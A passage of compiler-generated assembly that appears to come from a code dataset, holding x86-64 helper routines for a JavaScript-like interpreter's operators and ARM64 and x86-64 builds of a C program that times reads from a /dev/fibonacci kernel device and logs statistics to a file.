movq %rdx, -56(%rbp)
cmpq $0, -56(%rbp)
je LBB14_2
## %bb.1:
movq -32(%rbp), %rax
movq %rax, -16(%rbp)
movq -24(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB14_3
LBB14_2:
movq -48(%rbp), %rax
movq %rax, -16(%rbp)
movq -40(%rbp), %rax
movq %rax, -8(%rbp)
LBB14_3:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsNOT ## -- Begin function jsNOT
.p2align 4, 0x90
_jsNOT: ## @jsNOT
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToBoolean
movl %eax, -48(%rbp)
movq %rdx, -40(%rbp)
cmpq $0, -40(%rbp)
je LBB15_2
## %bb.1:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
jmp LBB15_3
LBB15_2:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
LBB15_3:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsSEQU ## -- Begin function jsSEQU
.p2align 4, 0x90
_jsSEQU: ## @jsSEQU
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
movl -48(%rbp), %edx
movq -40(%rbp), %rcx
callq _StrictEqualityComparison
movl %eax, -16(%rbp)
movq %rdx, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsSNEQ ## -- Begin function jsSNEQ
.p2align 4, 0x90
_jsSNEQ: ## @jsSNEQ
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
movl -48(%rbp), %edx
movq -40(%rbp), %rcx
callq _StrictEqualityComparison
movl %eax, -64(%rbp)
movq %rdx, -56(%rbp)
cmpq $0, -56(%rbp)
je LBB17_2
## %bb.1:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
jmp LBB17_3
LBB17_2:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
LBB17_3:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsEQU ## -- Begin function jsEQU
.p2align 4, 0x90
_jsEQU: ## @jsEQU
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
movl -48(%rbp), %edx
movq -40(%rbp), %rcx
callq _AbstractEqualityComparison
movl %eax, -16(%rbp)
movq %rdx, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsNEQ ## -- Begin function jsNEQ
.p2align 4, 0x90
_jsNEQ: ## @jsNEQ
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
movl -48(%rbp), %edx
movq -40(%rbp), %rcx
callq _AbstractEqualityComparison
movl %eax, -64(%rbp)
movq %rdx, -56(%rbp)
cmpq $0, -56(%rbp)
je LBB19_2
## %bb.1:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
jmp LBB19_3
LBB19_2:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
LBB19_3:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsLT ## -- Begin function jsLT
.p2align 4, 0x90
_jsLT: ## @jsLT
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
movl -48(%rbp), %edx
movq -40(%rbp), %rcx
callq _AbstractRelationalComparison
movl %eax, -16(%rbp)
movq %rdx, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsGT ## -- Begin function jsGT
.p2align 4, 0x90
_jsGT: ## @jsGT
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -48(%rbp), %edi
movq -40(%rbp), %rsi
movl -32(%rbp), %edx
movq -24(%rbp), %rcx
callq _AbstractRelationalComparison
movl %eax, -16(%rbp)
movq %rdx, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsLE ## -- Begin function jsLE
.p2align 4, 0x90
_jsLE: ## @jsLE
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -48(%rbp), %edi
movq -40(%rbp), %rsi
movl -32(%rbp), %edx
movq -24(%rbp), %rcx
callq _AbstractRelationalComparison
movl %eax, -64(%rbp)
movq %rdx, -56(%rbp)
cmpq $0, -56(%rbp)
je LBB22_2
## %bb.1:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
jmp LBB22_3
LBB22_2:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
LBB22_3:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsGE ## -- Begin function jsGE
.p2align 4, 0x90
_jsGE: ## @jsGE
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
movl -48(%rbp), %edx
movq -40(%rbp), %rcx
callq _AbstractRelationalComparison
movl %eax, -64(%rbp)
movq %rdx, -56(%rbp)
cmpq $0, -56(%rbp)
je LBB23_2
## %bb.1:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
jmp LBB23_3
LBB23_2:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
LBB23_3:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsTER ## -- Begin function jsTER
.p2align 4, 0x90
_jsTER: ## @jsTER
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl %r8d, -64(%rbp)
movq %r9, -56(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToBoolean
movl %eax, -80(%rbp)
movq %rdx, -72(%rbp)
cmpq $0, -72(%rbp)
je LBB24_2
## %bb.1:
movq -48(%rbp), %rax
movq %rax, -16(%rbp)
movq -40(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB24_3
LBB24_2:
movq -64(%rbp), %rax
movq %rax, -16(%rbp)
movq -56(%rbp), %rax
movq %rax, -8(%rbp)
LBB24_3:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $80, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/26371.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ; -- Begin function main
lCPI0_0:
.quad 0x408f380000000000 ; double 999
lCPI0_1:
.quad 0x408f400000000000 ; double 1000
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
mov w9, #16176
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
sub sp, sp, #3, lsl #12 ; =12288
sub sp, sp, #3888
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str wzr, [sp, #92]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fopen
str x0, [sp, #80]
adrp x8, l___const.main.write_buf@PAGE
add x8, x8, l___const.main.write_buf@PAGEOFF
ldr q0, [x8]
stur q0, [x29, #-48]
mov w8, #100
str w8, [sp, #76]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
mov w1, #2
bl _open
str w0, [sp, #72]
ldr w8, [sp, #72]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _perror
mov w0, #1
bl _exit
LBB0_2:
str wzr, [sp, #68]
b LBB0_3
LBB0_3: ; =>This Loop Header: Depth=1
; Child Loop BB0_5 Depth 2
; Child Loop BB0_9 Depth 2
; Child Loop BB0_11 Depth 3
; Child Loop BB0_15 Depth 3
ldr w8, [sp, #68]
ldr w9, [sp, #76]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_25
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=1
add x0, sp, #144
mov x1, #16000
bl _bzero
str xzr, [sp, #128]
str xzr, [sp, #136]
str xzr, [sp, #112]
str xzr, [sp, #120]
str xzr, [sp, #96]
str xzr, [sp, #104]
str wzr, [sp, #64]
b LBB0_5
LBB0_5: ; Parent Loop BB0_3 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #64]
subs w8, w8, #1000
cset w8, ge
tbnz w8, #0, LBB0_8
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_5 Depth=2
ldr w0, [sp, #72]
ldrsw x1, [sp, #68]
mov w2, #0
bl _lseek
ldr w0, [sp, #72]
sub x1, x29, #48
str x1, [sp, #24] ; 8-byte Folded Spill
mov x2, #0
bl _write
ldr x1, [sp, #24] ; 8-byte Folded Reload
scvtf d0, x0
str d0, [sp, #56]
ldr w0, [sp, #72]
mov x2, #1
bl _write
scvtf d0, x0
str d0, [sp, #48]
ldr d0, [sp, #56]
ldrsw x9, [sp, #64]
add x8, sp, #144
str d0, [x8, x9, lsl #3]
ldrsw x9, [sp, #64]
ldr d1, [x8, x9, lsl #3]
ldr d0, [sp, #128]
fadd d0, d0, d1
str d0, [sp, #128]
ldr d0, [sp, #48]
mov x9, #8000
mov x10, x8
add x10, x10, x9
ldrsw x11, [sp, #64]
str d0, [x10, x11, lsl #3]
add x8, x8, x9
ldrsw x9, [sp, #64]
ldr d1, [x8, x9, lsl #3]
ldr d0, [sp, #136]
fadd d0, d0, d1
str d0, [sp, #136]
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_5 Depth=2
ldr w8, [sp, #64]
add w8, w8, #1
str w8, [sp, #64]
b LBB0_5
LBB0_8: ; in Loop: Header=BB0_3 Depth=1
str wzr, [sp, #44]
b LBB0_9
LBB0_9: ; Parent Loop BB0_3 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_11 Depth 3
; Child Loop BB0_15 Depth 3
ldr w8, [sp, #44]
subs w8, w8, #2
cset w8, ge
tbnz w8, #0, LBB0_23
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_9 Depth=2
str wzr, [sp, #40]
ldrsw x9, [sp, #44]
add x8, sp, #128
add x8, x8, x9, lsl #3
ldr d0, [x8]
adrp x9, lCPI0_1@PAGE
ldr d1, [x9, lCPI0_1@PAGEOFF]
fdiv d0, d0, d1
str d0, [x8]
str wzr, [sp, #36]
b LBB0_11
LBB0_11: ; Parent Loop BB0_3 Depth=1
; Parent Loop BB0_9 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #36]
subs w8, w8, #1000
cset w8, ge
tbnz w8, #0, LBB0_14
b LBB0_12
LBB0_12: ; in Loop: Header=BB0_11 Depth=3
ldrsw x8, [sp, #44]
mov x11, #8000
mul x10, x8, x11
add x9, sp, #144
mov x8, x9
add x8, x8, x10
ldrsw x10, [sp, #36]
ldr d0, [x8, x10, lsl #3]
ldrsw x10, [sp, #44]
add x8, sp, #128
ldr d1, [x8, x10, lsl #3]
fsub d0, d0, d1
ldrsw x10, [sp, #44]
mul x10, x10, x11
add x9, x9, x10
ldrsw x10, [sp, #36]
ldr d1, [x9, x10, lsl #3]
ldrsw x9, [sp, #44]
ldr d2, [x8, x9, lsl #3]
fsub d1, d1, d2
ldrsw x9, [sp, #44]
add x8, sp, #112
add x8, x8, x9, lsl #3
ldr d2, [x8]
fmadd d0, d0, d1, d2
str d0, [x8]
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_11 Depth=3
ldr w8, [sp, #36]
add w8, w8, #1
str w8, [sp, #36]
b LBB0_11
LBB0_14: ; in Loop: Header=BB0_9 Depth=2
ldrsw x9, [sp, #44]
add x8, sp, #112
ldr d0, [x8, x9, lsl #3]
adrp x9, lCPI0_0@PAGE
ldr d1, [x9, lCPI0_0@PAGEOFF]
fdiv d0, d0, d1
fsqrt d0, d0
ldrsw x9, [sp, #44]
str d0, [x8, x9, lsl #3]
str wzr, [sp, #32]
b LBB0_15
LBB0_15: ; Parent Loop BB0_3 Depth=1
; Parent Loop BB0_9 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #32]
subs w8, w8, #1000
cset w8, ge
tbnz w8, #0, LBB0_21
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_15 Depth=3
ldrsw x8, [sp, #44]
mov x9, #8000
mul x9, x8, x9
add x8, sp, #144
add x8, x8, x9
ldrsw x9, [sp, #32]
ldr d0, [x8, x9, lsl #3]
ldrsw x9, [sp, #44]
add x8, sp, #128
ldr d3, [x8, x9, lsl #3]
ldrsw x9, [sp, #44]
add x8, sp, #112
ldr d2, [x8, x9, lsl #3]
fmov d1, #2.00000000
fmadd d1, d1, d2, d3
fcmp d0, d1
cset w8, hi
tbnz w8, #0, LBB0_19
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_15 Depth=3
ldrsw x8, [sp, #44]
mov x9, #8000
mul x9, x8, x9
add x8, sp, #144
add x8, x8, x9
ldrsw x9, [sp, #32]
ldr d0, [x8, x9, lsl #3]
ldrsw x9, [sp, #44]
add x8, sp, #128
ldr d3, [x8, x9, lsl #3]
ldrsw x9, [sp, #44]
add x8, sp, #112
ldr d2, [x8, x9, lsl #3]
fmov d1, #-2.00000000
fmadd d1, d1, d2, d3
fcmp d0, d1
cset w8, lt
tbnz w8, #0, LBB0_19
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_15 Depth=3
ldrsw x8, [sp, #44]
mov x9, #8000
mul x9, x8, x9
add x8, sp, #144
add x8, x8, x9
ldrsw x9, [sp, #32]
ldr d1, [x8, x9, lsl #3]
ldrsw x9, [sp, #44]
add x8, sp, #96
add x8, x8, x9, lsl #3
ldr d0, [x8]
fadd d0, d0, d1
str d0, [x8]
ldr w8, [sp, #40]
add w8, w8, #1
str w8, [sp, #40]
b LBB0_19
LBB0_19: ; in Loop: Header=BB0_15 Depth=3
b LBB0_20
LBB0_20: ; in Loop: Header=BB0_15 Depth=3
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB0_15
LBB0_21: ; in Loop: Header=BB0_9 Depth=2
ldr s1, [sp, #40]
; implicit-def: $d0
fmov s0, s1
sshll.2d v0, v0, #0
; kill: def $d0 killed $d0 killed $q0
scvtf d1, d0
ldrsw x9, [sp, #44]
add x8, sp, #96
add x8, x8, x9, lsl #3
ldr d0, [x8]
fdiv d0, d0, d1
str d0, [x8]
b LBB0_22
LBB0_22: ; in Loop: Header=BB0_9 Depth=2
ldr w8, [sp, #44]
add w8, w8, #1
str w8, [sp, #44]
b LBB0_9
LBB0_23: ; in Loop: Header=BB0_3 Depth=1
ldr x0, [sp, #80]
ldr w8, [sp, #68]
; implicit-def: $x9
mov x9, x8
ldr d1, [sp, #96]
ldr d0, [sp, #104]
mov x8, sp
str x9, [x8]
str d1, [x8, #8]
str d0, [x8, #16]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _fprintf
b LBB0_24
LBB0_24: ; in Loop: Header=BB0_3 Depth=1
ldr w8, [sp, #68]
add w8, w8, #1
str w8, [sp, #68]
b LBB0_3
LBB0_25:
ldr x0, [sp, #80]
bl _fclose
ldr w0, [sp, #72]
bl _close
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_27
b LBB0_26
LBB0_26:
bl ___stack_chk_fail
LBB0_27:
mov w0, #0
add sp, sp, #3, lsl #12 ; =12288
add sp, sp, #3888
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
ldp x28, x27, [sp], #32 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "time_result"
l_.str.1: ; @.str.1
.asciz "a"
l___const.main.write_buf: ; @__const.main.write_buf
.asciz "testing writing"
l_.str.2: ; @.str.2
.asciz "/dev/fibonacci"
l_.str.3: ; @.str.3
.asciz "Failed to open character device"
l_.str.4: ; @.str.4
.asciz "%d %f %f\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function main
LCPI0_0:
.quad 0x408f400000000000 ## double 1000
LCPI0_1:
.quad 0x408f380000000000 ## double 999
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl $16144, %eax ## imm = 0x3F10
callq ____chkstk_darwin
subq %rax, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -16084(%rbp)
leaq L_.str(%rip), %rdi
leaq L_.str.1(%rip), %rsi
callq _fopen
movq %rax, -16096(%rbp)
movq L___const.main.write_buf(%rip), %rax
movq %rax, -32(%rbp)
movq L___const.main.write_buf+8(%rip), %rax
movq %rax, -24(%rbp)
movl $100, -16100(%rbp)
leaq L_.str.2(%rip), %rdi
movl $2, %esi
movb $0, %al
callq _open
movl %eax, -16104(%rbp)
cmpl $0, -16104(%rbp)
jge LBB0_2
## %bb.1:
leaq L_.str.3(%rip), %rdi
callq _perror
movl $1, %edi
callq _exit
LBB0_2:
movl $0, -16108(%rbp)
LBB0_3: ## =>This Loop Header: Depth=1
## Child Loop BB0_5 Depth 2
## Child Loop BB0_9 Depth 2
## Child Loop BB0_11 Depth 3
## Child Loop BB0_15 Depth 3
movl -16108(%rbp), %eax
cmpl -16100(%rbp), %eax
jg LBB0_25
## %bb.4: ## in Loop: Header=BB0_3 Depth=1
leaq -16032(%rbp), %rdi
xorl %esi, %esi
movl $16000, %edx ## imm = 0x3E80
callq _memset
leaq -16048(%rbp), %rdi
xorl %esi, %esi
movl $16, %edx
callq _memset
leaq -16064(%rbp), %rdi
xorl %esi, %esi
movl $16, %edx
callq _memset
leaq -16080(%rbp), %rdi
xorl %esi, %esi
movl $16, %edx
callq _memset
movl $0, -16112(%rbp)
LBB0_5: ## Parent Loop BB0_3 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $1000, -16112(%rbp) ## imm = 0x3E8
jge LBB0_8
## %bb.6: ## in Loop: Header=BB0_5 Depth=2
movl -16104(%rbp), %edi
movslq -16108(%rbp), %rsi
xorl %edx, %edx
callq _lseek
movl -16104(%rbp), %edi
leaq -32(%rbp), %rsi
xorl %eax, %eax
movl %eax, %edx
callq _write
cvtsi2sd %rax, %xmm0
movsd %xmm0, -16120(%rbp)
movl -16104(%rbp), %edi
leaq -32(%rbp), %rsi
movl $1, %edx
callq _write
cvtsi2sd %rax, %xmm0
movsd %xmm0, -16128(%rbp)
movsd -16120(%rbp), %xmm0 ## xmm0 = mem[0],zero
movslq -16112(%rbp), %rax
movsd %xmm0, -16032(%rbp,%rax,8)
movslq -16112(%rbp), %rax
movsd -16032(%rbp,%rax,8), %xmm0 ## xmm0 = mem[0],zero
addsd -16048(%rbp), %xmm0
movsd %xmm0, -16048(%rbp)
movsd -16128(%rbp), %xmm0 ## xmm0 = mem[0],zero
movslq -16112(%rbp), %rax
movsd %xmm0, -8032(%rbp,%rax,8)
movslq -16112(%rbp), %rax
movsd -8032(%rbp,%rax,8), %xmm0 ## xmm0 = mem[0],zero
addsd -16040(%rbp), %xmm0
movsd %xmm0, -16040(%rbp)
## %bb.7: ## in Loop: Header=BB0_5 Depth=2
movl -16112(%rbp), %eax
addl $1, %eax
movl %eax, -16112(%rbp)
jmp LBB0_5
LBB0_8: ## in Loop: Header=BB0_3 Depth=1
movl $0, -16132(%rbp)
LBB0_9: ## Parent Loop BB0_3 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_11 Depth 3
## Child Loop BB0_15 Depth 3
cmpl $2, -16132(%rbp)
jge LBB0_23
## %bb.10: ## in Loop: Header=BB0_9 Depth=2
movl $0, -16136(%rbp)
movslq -16132(%rbp), %rax
movsd -16048(%rbp,%rax,8), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI0_0(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, -16048(%rbp,%rax,8)
movl $0, -16140(%rbp)
LBB0_11: ## Parent Loop BB0_3 Depth=1
## Parent Loop BB0_9 Depth=2
## => This Inner Loop Header: Depth=3
cmpl $1000, -16140(%rbp) ## imm = 0x3E8
jge LBB0_14
## %bb.12: ## in Loop: Header=BB0_11 Depth=3
movslq -16132(%rbp), %rcx
leaq -16032(%rbp), %rax
imulq $8000, %rcx, %rcx ## imm = 0x1F40
addq %rcx, %rax
movslq -16140(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movslq -16132(%rbp), %rax
subsd -16048(%rbp,%rax,8), %xmm0
movslq -16132(%rbp), %rcx
leaq -16032(%rbp), %rax
imulq $8000, %rcx, %rcx ## imm = 0x1F40
addq %rcx, %rax
movslq -16140(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm2 ## xmm2 = mem[0],zero
movslq -16132(%rbp), %rax
subsd -16048(%rbp,%rax,8), %xmm2
movslq -16132(%rbp), %rax
movsd -16064(%rbp,%rax,8), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, -16064(%rbp,%rax,8)
## %bb.13: ## in Loop: Header=BB0_11 Depth=3
movl -16140(%rbp), %eax
addl $1, %eax
movl %eax, -16140(%rbp)
jmp LBB0_11
LBB0_14: ## in Loop: Header=BB0_9 Depth=2
movslq -16132(%rbp), %rax
movsd -16064(%rbp,%rax,8), %xmm0 ## xmm0 = mem[0],zero
movsd LCPI0_1(%rip), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
sqrtsd %xmm0, %xmm0
movslq -16132(%rbp), %rax
movsd %xmm0, -16064(%rbp,%rax,8)
movl $0, -16144(%rbp)
LBB0_15: ## Parent Loop BB0_3 Depth=1
## Parent Loop BB0_9 Depth=2
## => This Inner Loop Header: Depth=3
cmpl $1000, -16144(%rbp) ## imm = 0x3E8
jge LBB0_21
## %bb.16: ## in Loop: Header=BB0_15 Depth=3
movslq -16132(%rbp), %rcx
leaq -16032(%rbp), %rax
imulq $8000, %rcx, %rcx ## imm = 0x1F40
addq %rcx, %rax
movslq -16144(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm1 ## xmm1 = mem[0],zero
movslq -16132(%rbp), %rax
movsd -16048(%rbp,%rax,8), %xmm2 ## xmm2 = mem[0],zero
movslq -16132(%rbp), %rax
movsd -16064(%rbp,%rax,8), %xmm0 ## xmm0 = mem[0],zero
addsd %xmm0, %xmm0
addsd %xmm2, %xmm0
ucomisd %xmm1, %xmm0
jb LBB0_19
## %bb.17: ## in Loop: Header=BB0_15 Depth=3
movslq -16132(%rbp), %rcx
leaq -16032(%rbp), %rax
imulq $8000, %rcx, %rcx ## imm = 0x1F40
addq %rcx, %rax
movslq -16144(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movslq -16132(%rbp), %rax
movsd -16048(%rbp,%rax,8), %xmm1 ## xmm1 = mem[0],zero
movslq -16132(%rbp), %rax
movsd -16064(%rbp,%rax,8), %xmm2 ## xmm2 = mem[0],zero
addsd %xmm2, %xmm2
subsd %xmm2, %xmm1
ucomisd %xmm1, %xmm0
jb LBB0_19
## %bb.18: ## in Loop: Header=BB0_15 Depth=3
movslq -16132(%rbp), %rcx
leaq -16032(%rbp), %rax
imulq $8000, %rcx, %rcx ## imm = 0x1F40
addq %rcx, %rax
movslq -16144(%rbp), %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
movslq -16132(%rbp), %rax
addsd -16080(%rbp,%rax,8), %xmm0
movsd %xmm0, -16080(%rbp,%rax,8)
movl -16136(%rbp), %eax
addl $1, %eax
movl %eax, -16136(%rbp)
LBB0_19: ## in Loop: Header=BB0_15 Depth=3
jmp LBB0_20
LBB0_20: ## in Loop: Header=BB0_15 Depth=3
movl -16144(%rbp), %eax
addl $1, %eax
movl %eax, -16144(%rbp)
jmp LBB0_15
LBB0_21: ## in Loop: Header=BB0_9 Depth=2
cvtsi2sdl -16136(%rbp), %xmm1
movslq -16132(%rbp), %rax
movsd -16080(%rbp,%rax,8), %xmm0 ## xmm0 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, -16080(%rbp,%rax,8)
## %bb.22: ## in Loop: Header=BB0_9 Depth=2
movl -16132(%rbp), %eax
addl $1, %eax
movl %eax, -16132(%rbp)
jmp LBB0_9
LBB0_23: ## in Loop: Header=BB0_3 Depth=1
movq -16096(%rbp), %rdi
movl -16108(%rbp), %edx
movsd -16080(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd -16072(%rbp), %xmm1 ## xmm1 = mem[0],zero
leaq L_.str.4(%rip), %rsi
movb $2, %al
callq _fprintf
## %bb.24: ## in Loop: Header=BB0_3 Depth=1
movl -16108(%rbp), %eax
addl $1, %eax
movl %eax, -16108(%rbp)
jmp LBB0_3
LBB0_25:
movq -16096(%rbp), %rdi
callq _fclose
movl -16104(%rbp), %edi
callq _close
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_27
## %bb.26:
xorl %eax, %eax
addq $16144, %rsp ## imm = 0x3F10
popq %rbp
retq
LBB0_27:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "time_result"
L_.str.1: ## @.str.1
.asciz "a"
.p2align 4 ## @__const.main.write_buf
L___const.main.write_buf:
.asciz "testing writing"
L_.str.2: ## @.str.2
.asciz "/dev/fibonacci"
L_.str.3: ## @.str.3
.asciz "Failed to open character device"
L_.str.4: ## @.str.4
.asciz "%d %f %f\n"
